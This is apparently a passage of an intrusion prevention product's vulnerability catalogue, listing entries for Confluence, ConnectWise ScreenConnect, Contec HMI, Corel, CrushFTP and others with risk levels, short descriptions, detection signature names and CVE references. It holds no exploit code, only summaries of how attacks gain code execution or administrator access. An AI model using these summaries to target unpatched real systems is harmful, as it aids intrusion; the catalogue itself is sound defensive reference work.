About this vulnerability: Conflict with Content-Type header and actual data
Risk: Low
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Malfunction
Description: There is a conflict between the actual data and the Content-Type header sent by the server. This condition might be a result of a misconfiguration of the server but it may also indicate an attack.
Situation: File-Binary_Conflicting-Content-Type-JPEG
File-OLE_Conflicting-Content-Type-Text
File-OLE_Conflicting-Content-Type-Text-HTML
File-OLE_Conflicting-Content-Type-Text-Plain
File-Flash_Conflicting-Content-Type-Text
File-Flash_Conflicting-Content-Type-Text-HTML
File-Flash_Conflicting-Content-Type-Text-Plain
File-PDF_Conflicting-Content-Type-Text
File-PDF_Conflicting-Content-Type-Text-HTML
File-PDF_Conflicting-Content-Type-Text-Plain
File-Binary_Conflicting-Content-Type-Text
File-Binary_Conflicting-Content-Type-Text-HTML
File-Binary_Conflicting-Content-Type-Text-Plain
File-JPEG_Conflicting-Content-Type-Text
File-JPEG_Conflicting-Content-Type-Text-HTML
File-JPEG_Conflicting-Content-Type-Text-Plain
File-PNG_Conflicting-Content-Type-Text
File-PNG_Conflicting-Content-Type-Text-HTML
File-PNG_Conflicting-Content-Type-Text-Plain
File-GIF_Conflicting-Content-Type-Text
File-GIF_Conflicting-Content-Type-Text-HTML
File-GIF_Conflicting-Content-Type-Text-Plain
File-RTF_Conflicting-Content-Type-Text
File-RTF_Conflicting-Content-Type-Text-HTML
File-RTF_Conflicting-Content-Type-Text-Plain
File-RTF_Conflicting-Content-Type-Word-Doc
File-RIFF_Conflicting-Content-Type-Text
File-RIFF_Conflicting-Content-Type-Text-HTML
File-RIFF_Conflicting-Content-Type-Text-Plain
File-MPEG_Conflicting-Content-Type-Text
File-MPEG_Conflicting-Content-Type-Text-HTML
File-MPEG_Conflicting-Content-Type-Text-Plain
File-Zip_Conflicting-Content-Type-Text
File-Zip_Conflicting-Content-Type-Text-HTML
File-Zip_Conflicting-Content-Type-Text-Plain
File-Exe_Conflicting-Content-Type-Text
File-Exe_Conflicting-Content-Type-Text-HTML
File-Exe_Conflicting-Content-Type-Text-Plain
Back to top

Confluence-Access-Control-Vulnerability-CVE-2023-22515

About this vulnerability: A vulnerability in Confluence Data Center and Server
Risk: High
First detected in: sgpkg-ips-1640-5242
Last changed: sgpkg-ips-1640-5242
Platform: Generic
Software: Confluence
Type: Malfunction
Description: A broken access control vulnerability has been reported in Confluence Data Center and Server. Successfully exploiting this vulnerability allows an unauthenticated attacker to create a new Confluence user with administrator privileges.
Situation: HTTP_CRL-Confluence-Access-Control-Vulnerability-CVE-2023-22515
HTTP_CSU-Confluence-Setupadministrator.action-Endpoint-Access
HTTP_CSU-Confluence-Access-Control-Vulnerability-CVE-2023-22515-2
References:
CVE-2023-22515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22515
Back to top

Confluence-Hardcoded-Credentials-CVE-2022-26138

About this vulnerability: A vulnerability in Confluence
Risk: High
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: Confluence
Type: Input Validation
Description: Hardcoded credentials in Confluence allow anyone to access it
Situation: HTTP_CRL-Confluence-Hardcoded-Credentials-CVE-2022-26138
References:
CVE-2022-26138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138
Back to top

Confluence-Improper-Authorization-CVE-2023-22518

About this vulnerability: An attempt to exploit a vulnerability in Confluence detected
Risk: High
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Platform: Generic
Software: Confluence
Type: Input Validation
Description: This improper authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to, but not limited to, full loss of confidentiality, integrity and availability. All versions of Confluence Data Center and Server are affected by this vulnerability. However, Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an "atlassian.net" domain, it is hosted by Atlassian and is not vulnerable to this issue.
Situation: HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-1
HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-2
File-Text_Confluence-Improper-Authorization-CVE-2023-22518
References:
CVE-2023-22518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22518
Back to top

Confluence-OGNL-Injection-CVE-2021-26084

About this vulnerability: A vulnerability in Confluence
Risk: High
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Platform: Generic
Software: Confluence
Type: Code Injection
Description: There exists an OGNL injection vulnerability in Confluence Server and Data Center. A successful exploitation of this vulnerability may lead to arbitrary code execution.
Situation: HTTP_CRL-Confluence-OGNL-Injection-CVE-2021-26084
References:
CVE-2021-26084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084
Back to top

Confluence-OGNL-Injection-CVE-2022-26134

About this vulnerability: A vulnerability in Confluence
Risk: High
First detected in: sgpkg-ips-1475-5242
Last changed: sgpkg-ips-1495-5242
Platform: Generic
Software: Confluence
Type: Code Injection
Description: There exists an OGNL injection vulnerability in Confluence Server and Data Center. A successful exploitation of this vulnerability may lead to arbitrary code execution.
Situation: HTTP_CSU-Suspicious-OGNL-Expression
HTTP_CSU-Suspicious-OGNL-Expression-2
References:
CVE-2022-26134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134
Back to top

Confluence-Path-Traversal-CVE-2019-3398

About this vulnerability: A vulnerability in Confluence
Risk: High
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1304-5242
Platform: Generic
Software: Confluence
Type: Input Validation
Description: There has been reported a path traversal vulnerability in Confluence Server and Confluence Data Center. Successful exploitation may allow a remote attacker with certain permissions to write files to arbitrary locations, which can lead to remote code execution on vulnerable versions of Confluence Server or Data Center.
Situation: HTTP_CRL-Confluence-Path-Traversal-CVE-2019-3398
References:
CVE-2019-3398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3398
Back to top

Confluence-Remote-Code-Execution-CVE-2019-3396

About this vulnerability: A vulnerability in Confluence
Risk: High
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Confluence
Type: Input Validation
Description: There has been reported a remote code execution vulnerability in Confluence Server and Data Center. A remote attacker can exploit this issue by injecting malicious code to the target service. Successful exploitation can lead in arbitrary code execution on the target server.
Situation: HTTP_CRL-Confluence-Remote-Code-Execution-CVE-2019-3396
References:
CVE-2019-3396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
Back to top

Confluence-Template-Injection-CVE-2023-22527

About this vulnerability: A vulnerability in Confluence
Risk: High
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Platform: Generic
Software: Confluence
Type: Malfunction
Description: A template injection vulnerability has been reported in Atlassian Confluence.
Situation: HTTP_CRL-Confluence-Template-Injection-CVE-2023-22527
References:
CVE-2023-22527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22527
Back to top

Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709

About this vulnerability: A vulnerability in ConnectWise ScreenConnect
Risk: High
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Platform: Generic
Software: ConnectWise ScreenConnect
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in ConnectWise ScreenConnect 23.9.7 and earlier.
Situation: HTTP_CSU-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709
HTTP_CRL-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709-New-Account
References:
CVE-2024-1709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1709
Back to top

Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708

About this vulnerability: A vulnerability in ConnectWise ScreenConnect
Risk: High
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1698-5242
Platform: Generic
Software: ConnectWise ScreenConnect
Type: Input Validation
Description: A directory traversal vulnerability has been reported in ConnectWise ScreenConnect. The vulnerability is due to improper validation of a zip file. Successful exploitation could result in code execution. While exploiting this vulnerability requires authentication, an attacker can first exploit CVE-2024-1709 in the same product to gain the required privileges.
Situation: HTTP_CSU-Connectwise-Screenconnect-CVE-2024-1708-Post-Exploitation-Activity
File-Text_Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708
References:
CVE-2024-1708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1708
Back to top

Conspy

About this vulnerability: ConSpy
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ConSpy
Type: Misconfiguration
Description: ConSpy is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Conspy
Back to top

Contaware-Freevimager-GIF-Lzwminimumcodesize-Memory-Corruption

About this vulnerability: A vulnerability in Contaware FreeVimager
Risk: Moderate
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Contaware FreeVimager
Type: Malfunction
Description: A memory corruption vulnerability has been found in Contaware FreeVimager. The vulnerability is due to an error in processing GIF images containing an invalid value for the LZWMinimumCodeSize field. An attacker could exploit this vulnerability by enticing a target user to open a maliciously crafted GIF file with the vulnerable product. In the case of a successful attack, arbitrary attacker code could be executed in the security context of the target user.
Situation: File-GIF_Contaware-Freevimager-GIF-Lzwminimumcodesize-Memory-Corruption
References:
BID-56869
http://www.securityfocus.com/bid/56869
OSVDB-88335
http://www.osvdb.org/88335
Back to top

Contec-Conprossys-HMI-System-Chkformula-Command-Injection

About this vulnerability: A vulnerability in Contec CONPROSYS HMI System (CHS)
Risk: Moderate
First detected in: sgpkg-ips-1546-5242
Last changed: sgpkg-ips-1546-5242
Platform: Generic
Software: Contec CONPROSYS HMI System
Type: Input Validation
Description: Insufficient sanitation of user data used in commands causes a command injection vulnerability in Contec CONPROSYS HMI System. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CS-Contec-Conprossys-HMI-System-Chkformula-Command-Injection
References:
CVE-2022-44456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44456
Back to top

Contec-Conprosys-HMI-System-Cpostgresql.php-SQL-Injection

About this vulnerability: A vulnerability in Contec CONPROSYS HMI System (CHS)
Risk: High
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1579-5242
Platform: Generic
Software: Contec CONPROSYS HMI System
Type: Input Validation
Description: A SQL injection vulnerability has been reported in Contec CONPROSYS HMI System. The vulnerability is due to insufficient sanitization of user data used in CPostgreSQL.php. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure in the target application's database.
Situation: HTTP_CSH-Contec-Conprosys-HMI-System-Cpostgresql.php-SQL-Injection
References:
CVE-2023-1658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1658
Back to top

Contec-Conprosys-HMI-System-CVE-2023-28651-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Contec CONPROSYS HMI System (CHS)
Risk: Moderate
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Platform: Generic
Software: Contec CONPROSYS HMI System
Type: Input Validation
Description: A stored cross-site scripting vulnerability exists in Contec CONPROSYS HMI System. The vulnerabilities is due missing parameter sanitization in multiple endpoints. A remote authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: File-Text_Contec-Conprosys-HMI-System-CVE-2023-28651-Stored-Cross-Site-Scripting
References:
CVE-2023-28651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28651
Back to top

Contec-Conprosys-HMI-System-CVE-2023-29154-SQL-Injection

About this vulnerability: A vulnerability in Contec CONPROSYS HMI System (CHS)
Risk: Moderate
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Platform: Generic
Software: Contec CONPROSYS HMI System
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Contec CONPROSYS HMI System. The vulnerability is due to missing parameter sanitization processed by the query settings endpoint. A remote authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in potential arbitrary code execution.
Situation: File-Text_Contec-Conprosys-HMI-System-CVE-2023-29154-SQL-Injection
References:
CVE-2023-29154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29154
Back to top

Content-After-Zero-Content-Length

About this vulnerability: Content was detected after zero content lenght was indicated
Risk: Moderate
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Misconfiguration
Description: Content was detected after zero content lenght was indicated
Situation: HTTP_SHS-Content-After-Zero-Content-Length
Back to top

Content-Encoding-Empty-Missing-Linefeed

About this vulnerability: Content-Encoding header followed with carriage return but no line feed
Risk: Low
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An HTTP reply header with immediate carriage return symbol but no linefeed may indicate inspection evading server behaviour.
Situation: HTTP_SHS-Deflate-Gzip-With-Extra-Header
Back to top

ContentKeeper-Web-Remote-Command-Execution

About this vulnerability: A ContentKeeper Web Remote Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ContentKeeper
Type: Input Validation
Description: A vulnerability in ContentKeeper, versions 125.09 and before, that allows remote attackers to write arbitrary data to default files and execute arbitrary commands via unathenticated access to certain binaries.
Situation: HTTP_CRL-ContentKeeper-Web-Remote-Command-Execution
References:
OSVDB-54551
http://www.osvdb.org/54551
Back to top

Cool-PDF-Image-Stream-Buffer-Overflow

About this vulnerability: A Cool PDF Image Stream Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CoolPDF Reader
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Cool PDF Reader, version 3.0.2.256, which allows remote attackers to execute arbitrary code via a PDF file with a crafted stream.
Situation: File-PDF_Cool-PDF-Image-Stream-Buffer-Overflow
References:
CVE-2012-4914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4914
OSVDB-89349
http://www.osvdb.org/89349
Back to top

Coolpdf-Reader-Image-Stream-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in CoolPDF Reader
Risk: Moderate
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CoolPDF Reader
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in CoolPDF Reader. The vulnerability is due to insufficient validation of streams while processing PDF files. This can lead to a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a specially crafted PDF file, which can lead to code execution in the context of the affected application. If code execution is unsuccessful, the application may terminate abnormally.
Situation: File-PDF_Coolpdf-Reader-Image-Stream-Processing-Buffer-Overflow
References:
CVE-2012-4914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4914
BID-57461
http://www.securityfocus.com/bid/57461
OSVDB-89349
http://www.osvdb.org/89349
Back to top

CoolPlayer-Playlist-File-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in CoolPlayer
Risk: Moderate
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CoolPlayer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in CoolPlayer. By persuading a user to open a crafted M3U playlist file with a vulnerable version of the affected application, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-CoolPlayer-Playlist-File-Handling-Buffer-Overflow
File-Binary_CoolPlayer-Playlist-File-Handling-Buffer-Overflow
References:
CVE-2008-3408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3408
BID-30418
http://www.securityfocus.com/bid/30418
OSVDB-47194
http://www.osvdb.org/47194
Back to top

Coppermine-Photo-Gallery-picEditor.php-Command-Execution

About this vulnerability: Coppermine Photo Gallery picEditor.php Command Execution Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Coppermine Photo Gallery
Type: Input Validation
Description: A vulnerability exists in Coppermine Photo Gallery picEditor.php when the ImageMagick library is configured to be used. The variables 'quality', 'angle', and 'clipval' parameters are not properly sanitized allowing remote command execution.
Situation: HTTP_CRL-Coppermine-Photo-Gallery-picEditor.php-Command-Execution
References:
CVE-2008-0506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0506
BID-27512
http://www.securityfocus.com/bid/27512
OSVDB-41676
http://www.osvdb.org/41676
Back to top

CoreHTTP-Url-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in CoreHTTP
Risk: Moderate
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1589-5242
Platform: Linux
Software: CoreHTTP
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in CoreHTTP.
Situation: HTTP_CSU-CoreHTTP-Url-Buffer-Overflow
References:
CVE-2007-4060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4060
BID-25120
http://www.securityfocus.com/bid/25120
OSVDB-46831
http://www.osvdb.org/46831
Back to top

Corel-Multiple-Products-Multiple-Insecure-Library-Loading

About this vulnerability: A vulnerability in Corel CorelDRAW X7
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: Corel CorelDRAW X7; Corel Painter 2015; Corel PaintShop Pro X7; Corel PDF Fusion; Corel Photo-Paint X7; Corel CAD; Corel VideoStudio Pro X7; Corel FastFlick
Type: Malfunction
Description: Multiple insecure library loading vulnerabilities have been reported in multiple Corel products. The vulnerabilities are due to the insecure loading of a number of libraries. These include but are not limited to, Wintab32.dll, TD_Mgd_3.08_9.dll, wacommt.dll, and quserex.dll. A remote attacker could exploit this vulnerability by enticing a user to open a file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Corel-Multiple-Products-Multiple-Insecure-Library-Loading
References:
CVE-2014-8393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8393
OSVDB-116981
http://www.osvdb.org/116981
Back to top

Corel-Paintshop-Pro-Insecure-Library-Loading

About this vulnerability: A vulnerability in Corel PaintShop Pro
Risk: Moderate
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: Corel PaintShop Pro
Type: Malfunction
Description: There is a code execution vulnerability in Corel's PaintShop Pro. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process an image file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Corel-Paintshop-Pro-Insecure-Library-Loading
References:
CVE-2013-0733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0733
BID-62836
http://www.securityfocus.com/bid/62836
OSVDB-98163
http://www.osvdb.org/98163
Back to top

Corel-PDF-Fusion-Wintab32.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Corel PDF Fusion
Risk: High
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: Corel PDF Fusion
Type: Malfunction
Description: A code execution vulnerability has been identified in Corel PDF Fusion. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to open a file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016
References:
CVE-2013-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0742
OSVDB-94934
http://www.osvdb.org/94934
Back to top

Corel-PDF-Fusion-XPS-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Corel PDF Fusion
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Corel PDF Fusion
Type: Buffer Overflow
Description: A code execution vulnerability exists in Corel PDF Fusion. The vulnerability is due to a stack buffer overflow when parsing names in ZIP directory entries of an XPS file. A remote attacker could exploit this vulnerability by enticing a user to open a crafted XPS file. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: File-Zip_Long-Filename
References:
CVE-2013-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3248
BID-61010
http://www.securityfocus.com/bid/61010
OSVDB-94933
http://www.osvdb.org/94933
Back to top

Corel-Wordperfect-Document-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Corel WordPerfect Office X6
Risk: Moderate
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Corel WordPerfect Office
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Corel WordPerfect. The vulnerability is due to an error in wpwin16.exe while processing WordPerfect documents. This can lead to heap memory corruption. An attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file with a vulnerable version of the application. This can lead to arbitrary code execution in the context of the affected application.
Situation: File-Binary_Corel-Wordperfect-Document-Processing-Buffer-Overflow
References:
CVE-2012-4900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4900
OSVDB-91041
http://www.osvdb.org/91041
Back to top

Corosync-Cluster-Engine-Totemcrypto.c-Integer-Overflow

About this vulnerability: A vulnerability in Corosync Cluster Engine
Risk: Moderate
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Corosync Cluster Engine
Type: Integer Overflow
Description: There has been reported an integer overflow vulnerability in Corosync. A remote attacker could exploit this vulnerability and cause arbitrary code execution by sending a crafted packets to a target server.
Situation: Generic_UDP-Corosync-Cluster-Engine-Totemcrypto.c-Integer-Overflow
References:
CVE-2018-1084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1084
BID-103758
http://www.securityfocus.com/bid/103758
Back to top

Corrupt-RTF-Header

About this vulnerability: Detects a corrupted RTF header
Risk: Low
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Malfunction
Description: A known corrupted header for RTF file has been detected. Could be used to hide malicious RTF content.
Situation: File-Text_Corrupt-RTF-Header
Back to top

Count.cgi-Vulnerabilities

About this vulnerability: Count.cgi file disclosure and buffer overflow
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Muhammad A. Muquit wwwcount
Type: Buffer Overflow
Description: The Count.cgi web access counter has a buffer overflow vulnerability. Successful exploit of this vulnerability leads to a remote system compromise.
Situation: HTTP_CSU-Count-Cgi-BOF
HTTP_CSU-Count-Cgi-Disclosure
References:
CVE-1999-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0021
BID-128
http://www.securityfocus.com/bid/128
Back to top

CPanel-Errorpage-Webcall-Id-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in cPanel
Risk: Moderate
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Platform: Generic
Software: cPanel
Type: Input Validation
Description: A reflected cross-site scripting has been reported in cPanel. The vulnerability is due to improper validation of user input in ErrorPage module. A remote attacker can exploit the vulnerability by enticing the victim to open a maliciously crafted link. Successful exploitation could result in arbitrary script code execution in the victim's browser.
Situation: HTTP_CRL-CPanel-Errorpage-Webcall-Id-Reflected-Cross-Site-Scripting
References:
CVE-2023-29489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29489
Back to top

Craft-CMS-Remote-Code-Execution-CVE-2024-56145

About this vulnerability: A vulnerability in Craft CMS
Risk: High
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1825-5242
Platform: Generic
Software: Craft CMS
Type: Malfunction
Description: A template injection vulnerability that allows unauthenticated remote code execution exists in Craft CMS. Versions prior to 3.9.14, 4.13.2, and 5.5.2 are vulnerable if register_argc_argv is enabled in the php.ini configuration file.
Situation: HTTP_CSU-Craft-CMS-Remote-Code-Execution-CVE-2024-56145
References:
CVE-2024-56145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56145
Back to top

Craft-CMS-Unauthenticated-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Craft CMS detected
Risk: High
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Platform: Linux; Unix
Software: Craft CMS
Type: Insecure Configuration
Description: A vulnerability in Craft CMS, versions 4.0.0-RC1 through 4.4.14, which allows remote attackers to upload and execute arbitrary PHP code with the \craft\controllers\ConditionsController class by the use of an Imagick object with a VID scheme.
Situation: HTTP_CRL-Craft-CMS-Unauthenticated-Remote-Code-Execution
References:
CVE-2023-41892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41892
Back to top

Cross-Site-Script-Encoder

About this vulnerability: Generic detection for cross site scripting
Risk: Moderate
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Any Software
Type: Cross-site Scripting
Description: Generic detection for cross-site scripts and encoder stubs. Exploit frameworks, such as Metasploit, generally use a library of cross-site scripts and encoders which are used by all generated exploits. Situations related to this vulnerability detect such sequences.
Situation: DNS-UDP_SS-Cross-Site-Script-Encoder
HTTP_CRL-Cross-Site-Script-Encoder
SIP-UDP_Cross-Site-Script-Encoder
Back to top

CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177

About this vulnerability: An attempt to exploit a vulnerability in CrushFTP detected
Risk: High
First detected in: sgpkg-ips-1655-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: CrushFTP
Type: Input Validation
Description: CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. The vulnerability allows attackers to read any files on the system as root via the webroot, but the file is deleted from its original location during the operation.
Situation: HTTP_CS-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
HTTP_CS-CrushFTP-Potential-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
HTTP_CRL-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
References:
CVE-2023-43177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43177
Back to top

CrushFTP-S3-Authentication-Bypass-CVE-2025-2825

About this vulnerability: An attempt to exploit a vulnerability in CrushFTP detected
Risk: High
First detected in: sgpkg-ips-1861-5242
Last changed: sgpkg-ips-1861-5242
Platform: Generic
Software: CrushFTP
Type: Input Validation
Description: CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass. Remote and unauthenticated HTTP requests to CrushFTP with known usernames can be used to impersonate a user and conduct actions on their behalf, including administrative actions and data retrieval.
Situation: HTTP_CSH-CrushFTP-S3-Authentication-Bypass-CVE-2025-2825
References:
CVE-2025-2825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-2825
Back to top

CrushFTP-Server-Side-Template-Injection-CVE-2024-4040

About this vulnerability: An attempt to exploit a vulnerability in CrushFTP detected
Risk: High
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1719-5242
Platform: Generic
Software: CrushFTP
Type: Input Validation
Description: A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.
Situation: HTTP_CRL-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040
HTTP_CSH-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040
References:
CVE-2024-4040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4040
Back to top

CryptoWall-Botnet

About this vulnerability: CryptoWall botnet
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1783-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: CryptoWall is a malicious botnet and is ransomware. After infecting the client, the bot encrypts personal files of the victim. The bot then displays a message asking the user to pay a ransom in order to obtain a key for decrypting his files. CryptoWall uses strong encryption and decryption is not possible without an appropriate key. However, it is also unclear if the attackers serve a valid key in case the ransom is paid. It is thus advised to restore file backups instead.
Situation: HTTP_CRL-CryptoWall-Botnet-Traffic
Back to top

Crypttech-CryptoLog-Remote-Code-Execution

About this vulnerability: An attempt to exploit a Crypttech CryptoLog Remote Code Execution vulnerability detected
Risk: High
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Crypttech
Type: SQL Injection
Description: A vulnerability in Crypttech CryptoLog which allows remote attackers to execute SQL commands via one of the user supplied parameters, due to the lack of proper input validation.
Situation: HTTP_CRL-Crypttech-CryptoLog-Remote-Code-Execution
Back to top

Cstealer-Infection-Traffic

About this vulnerability: Cstealer trojan infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Cstealer trojan infection traffic was detected.
Situation: Generic_CS-Cstealer-Infection-Traffic
Back to top

Ctek-SkyRouter-Command-Execution

